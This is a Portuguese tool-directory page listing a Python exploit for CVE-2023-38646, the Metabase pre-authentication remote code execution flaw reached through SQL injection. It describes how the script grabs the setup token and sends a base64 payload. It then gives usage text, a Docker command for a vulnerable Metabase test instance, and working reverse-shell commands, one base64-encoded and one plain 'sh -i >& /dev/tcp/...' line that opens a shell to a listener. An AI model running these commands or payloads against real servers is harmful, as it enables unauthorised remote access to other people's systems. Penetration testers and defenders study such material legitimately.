Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-38646 — Script Python para explorar CVE-2023-38646 Metabase RCE pré-autenticação via injeção de SQL | Kitploit
Ferramentas/GitHubGitHub/red4mber/cve-2023-38646
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubred4mber/cve-2023-38646

CVE-2023-38646

Script Python para explorar CVE-2023-38646 Metabase RCE pré-autenticação via injeção de SQL

Ver Repositório
2há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-38646

Script em Python para explorar o Metabase Pre-Auth RCE via injeção de SQL (CVE-2023-38646)

O script faz um GET em /api/session/properties para obter o token de configuração e avaliar a explorabilidade do alvo. Se vulnerável, ele imprimirá o token de configuração; caso contrário, encerrará após uma mensagem de erro.

Se a opção -x for usada e o alvo estiver vulnerável, ele usará o payload fornecido para tentar explorar a vulnerabilidade.

Mais informações neste excelente artigo da equipe que descobriu a vulnerabilidade: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

root@kitploit:~
Usage: CVE-2023-38646.py [-h] [-x BASE64 PAYLOAD] url

Metabase Pre-Auth RCE Exploit

positional arguments:
  url                Url of the metabase instance

optional arguments:
  -h, --help         Show this help message and exit
  -x BASE64_PAYLOAD  Exploits the vulnerability

Se necessário, você pode subir rapidamente um ambiente de teste em um contêiner Docker usando este comando:

root@kitploit:~
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.46.6

Depois de visitar http://127.0.0.1:3000/ para concluir a configuração e iniciar um listener,
Você pode explorar o RCE com algo assim:

root@kitploit:~
python3 ./CVE-2023-38646.py -x c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTAvNDQ0MyAwPiYx http://127.0.0.1:3000/

# If you prefer this and use bash (or anything but fish really)
# you should be able to command substitution to encode your payload directly inline like so
python3 ./CVE-2023-38646.py -x $(echo "sh -i >& /dev/tcp/127.0.0.1/4443 0>&1" | base64) http://127.0.0.1:3000/

ou simplesmente pegue seu próprio reverse shell codificado em base64 visitando revshells.com

Baixar ferramenta